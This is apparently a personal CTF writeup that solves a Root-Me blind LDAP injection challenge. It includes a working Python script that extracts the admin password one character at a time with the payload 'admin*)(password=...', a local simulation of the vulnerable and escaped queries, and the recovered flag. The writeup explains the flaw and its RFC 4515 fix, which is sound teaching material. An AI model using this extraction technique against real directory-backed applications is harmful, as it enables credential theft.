LDAP-injection-Blind | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.


I took the code from here: PayloadsAllTheThings, blind LDAP injection.

This is our script; I changed the URL and the true condition.

import requests, string

# Character set tried at every position of the value being extracted.
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

url = "http://challenge01.root-me.org/web-serveur/ch26/"
flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        # Injected search term. The server appends '*' to it, which turns the
        # injected clause into a prefix match: (password=<flag><char>*)
        payload = "admin*)(password=" + flag + char
        # params= URL-encodes the payload, so alphabet characters such as
        # '%', '=' and '"' reach the application intact instead of breaking the URL.
        r = requests.get(url, params={"action": "dir", "search": payload})
        if "admin" in r.text:  # true condition: the admin entry is still listed
            flag += char
            print("[+] Flag: " + flag)
            break
    else:
        # No character extended the prefix: the whole value has been recovered.
        break

Here we can see the blind injection working. It works because the developers append * to the search term: the query is meant for a prefix search, and that is how the wildcard gets there. We exploit this by closing the uid clause ourselves (admin*) and opening a second one, (password=<prefix><char>, which the server's trailing * completes into a prefix match on the password. The page only tells us whether an entry matched (whether "admin" appears in the response), so that one bit per request is enough to exfiltrate the value a character at a time. One caveat: if the attribute's matching rule is case-insensitive, as it is for many LDAP string attributes, the script recovers the value only up to case, and whichever matching letter comes first in the alphabet is the one recorded.
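To make the mechanism concrete, here is an added example (not the writeup's script and not the challenge's server code) that models the server side locally: a minimal LDAP filter parser and evaluator over a constructed in-memory directory, a search function with the assumed vulnerable filter shape (&(uid=<search>*)(objectClass=person)), the same character-by-character extraction loop run against it, and a hardened variant that escapes the user-supplied value per RFC 4515 so the injection no longer gets through. The page does not show the real server-side query, so the &-wrapper, the attribute names and the objectClass clause are assumptions; the directory contents are made up, except that the admin password is set to this writeup's flag so the local run reproduces the extraction. Matching is treated as case-sensitive, which is a simplification.

```python
import re
import string

# Constructed in-memory directory standing in for the challenge's LDAP server.
# The admin password is the flag from this writeup; the other entry is made up.
DIRECTORY = [
    {"uid": "admin", "password": "dsy365gdzerzo94", "objectClass": "person"},
    {"uid": "alice", "password": "hunter2", "objectClass": "person"},
]


def parse_filter(s, i=0):
    """Parse the parenthesised filter starting at s[i]; return (node, next_index).
    Supports &, |, ! and attr=value items where '*' is a wildcard."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if i < len(s) and s[i] in "&|!":
        op, i, children = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unterminated compound filter")
        return (op, children), i + 1
    j = s.index(")", i)  # ValueError if the item is never closed
    attr, sep, pattern = s[i:j].partition("=")
    if not sep:
        raise ValueError("unsupported filter item: %r" % s[i:j])
    return ("=", attr, pattern), j + 1


def _unescape(segment):
    # RFC 4515 hex escapes (\2a, \28, ...) back to the literal character.
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), segment)


def _value_matches(pattern, value):
    # Split on the wildcard first, then unescape, so an escaped \2a stays literal.
    # Simplification: case-sensitive; real servers follow the attribute's matching rule.
    parts = [re.escape(_unescape(p)) for p in pattern.split("*")]
    return re.fullmatch(".*".join(parts), value) is not None


def matches(node, entry):
    if node[0] == "&":
        return all(matches(c, entry) for c in node[1])
    if node[0] == "|":
        return any(matches(c, entry) for c in node[1])
    if node[0] == "!":
        return not matches(node[1][0], entry)
    _, attr, pattern = node
    return attr in entry and _value_matches(pattern, entry[attr])


def _run(flt):
    node, end = parse_filter(flt)
    if end != len(flt):
        raise ValueError("trailing data after filter")
    return [e["uid"] for e in DIRECTORY if matches(node, e)]


def vulnerable_search(search):
    """Assumed shape of the challenge's query: the search term is dropped in
    unescaped and a trailing '*' is appended to make it a prefix search."""
    try:
        return _run("(&(uid=%s*)(objectClass=person))" % search)
    except ValueError:
        return []  # a malformed filter is an error page: no 'admin' in it


def ldap_escape(value):
    """RFC 4515 escaping for a value placed inside a filter assertion."""
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)


def safe_search(search):
    """Same query, but the user-controlled value is escaped before insertion."""
    try:
        return _run("(&(uid=%s*)(objectClass=person))" % ldap_escape(search))
    except ValueError:
        return []


def extract_password(oracle, uid="admin",
                     alphabet=string.ascii_lowercase + string.digits, max_len=50):
    """The writeup's char-by-char loop against a local oracle: a guess is right
    when the injected '(password=<prefix><char>*)' clause still lets the uid
    entry through."""
    found = ""
    for _ in range(max_len):
        for ch in alphabet:
            if uid in oracle("%s*)(password=%s%s" % (uid, found, ch)):
                found += ch
                break
        else:
            break  # no character extends the prefix: the value is complete
    return found


if __name__ == "__main__":
    print("vulnerable:", extract_password(vulnerable_search))   # dsy365gdzerzo94
    print("hardened:  ", repr(extract_password(safe_search)))  # ''
```

Against vulnerable_search the loop recovers the full password because each injected clause is an AND with the real uid clause; against safe_search the payload's * ) ( become \2a \29 \28 inside the uid value, the filter stays a single clause that matches nothing, and the loop ends at once with an empty string.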

And this is the flag we obtained with the script:

Flag: dsy365gdzerzo94